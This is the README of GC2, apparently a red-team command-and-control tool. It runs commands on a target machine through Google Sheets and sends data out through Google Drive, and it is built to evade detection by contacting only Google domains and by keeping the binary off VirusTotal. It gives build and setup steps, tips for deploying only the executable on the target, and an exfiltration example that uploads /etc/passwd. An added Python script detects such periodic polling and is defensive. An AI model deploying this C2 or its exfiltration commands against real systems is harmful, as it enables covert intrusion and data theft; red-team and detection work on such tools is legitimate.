


GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.

Why

This program has been developed in order to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, …) during Red Teaming activities.

Furthermore, the program will interact only with Google’s domains (*.google.com) to make detection more difficult.

PS: Please don’t upload the compiled binary on VirusTotal 🙂

Set up

  1. Build executable

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    go build gc2-sheet.go
  2. Create a new google “service account”

    Create a new google “service account” using https://console.cloud.google.com/, create a .json key file for the service account

  3. Enable Google Sheet API and Google Drive API

    Enable Google Drive API https://developers.google.com/drive/api/v3/enable-drive-api and Google Sheet API https://developers.google.com/sheets/api/quickstart/go

  4. Set up Google Sheet and Google Drive

    Create a new Google Sheet and add the service account to the editor group of the spreadsheet (to add the service account use its email)

    Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)

  5. Start the C2

    gc2-sheet --key <GCP service account credential file .JSON > --sheet <Google sheet ID> --drive <Google drive ID>

PS: you can also hardcode the parameters in the code, so you will upload only the executable on the target machine (look at comments in root.go and authentication.go)

Features

  • Command execution using Google Sheet as a console
  • Download files on the target using Google Drive
  • Data exfiltration using Google Drive
  • Exit

Command execution

The program will perform a request to the spreadsheet every 5 sec to check if there are some new commands.
Commands must be inserted in the column “A”, and the output will be printed in the column “B”.
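From the defender's side, the fixed polling interval described above remains a usable signal even when every destination is a Google domain. The following is an added example, not part of GC2: it groups proxy records by host and process and flags callers whose request gaps are nearly constant. The log layout, host and process names, domain suffix list and thresholds are assumptions, and the records are constructed.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed proxy records: (epoch seconds, host, process, destination).
# Hosts, process names and destinations are made up for this example.
BEACON = [(t, "ws-014", "updater.exe", "sheets.googleapis.com")
          for t in (1000.0, 1005.1, 1010.0, 1015.2, 1020.1, 1025.0, 1030.1, 1035.0)]
BROWSER = [(t, "ws-014", "chrome.exe", "docs.google.com")
           for t in (1001.0, 1003.0, 1019.0, 1022.0, 1060.0, 1064.0, 1130.0)]
SPARSE = [(t, "ws-020", "sync.exe", "www.google.com") for t in (1000.0, 1005.0, 1010.0)]
SAMPLE = BEACON + BROWSER + SPARSE

# Assumed suffixes for Google-hosted traffic; adjust to what your proxy logs.
GOOGLE_SUFFIXES = (".google.com", ".googleapis.com")


def find_periodic_callers(records, min_events=6, max_cv=0.10):
    """Return {(host, process): mean gap in seconds} for near-constant polling.

    max_cv is the allowed coefficient of variation (stdev / mean) of the gaps
    between consecutive requests; min_events avoids judging short bursts.
    """
    seen = defaultdict(list)
    for ts, host, proc, dest in records:
        if dest.endswith(GOOGLE_SUFFIXES):
            seen[(host, proc)].append(ts)

    flagged = {}
    for key, stamps in seen.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            flagged[key] = round(avg, 1)
    return flagged


if __name__ == "__main__":
    for (host, proc), gap in find_periodic_callers(SAMPLE).items():
        print(f"{host} {proc}: request every ~{gap}s to Google-hosted services")
```

Legitimate sync clients also poll on a timer, so results are best reviewed against an allow-list of expected processes.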

Data exfiltration file

Special commands are reserved to perform the upload and download to the target machine

    From Target to Google Drive
    upload;<remote path>
    Example:
    upload;/etc/passwd

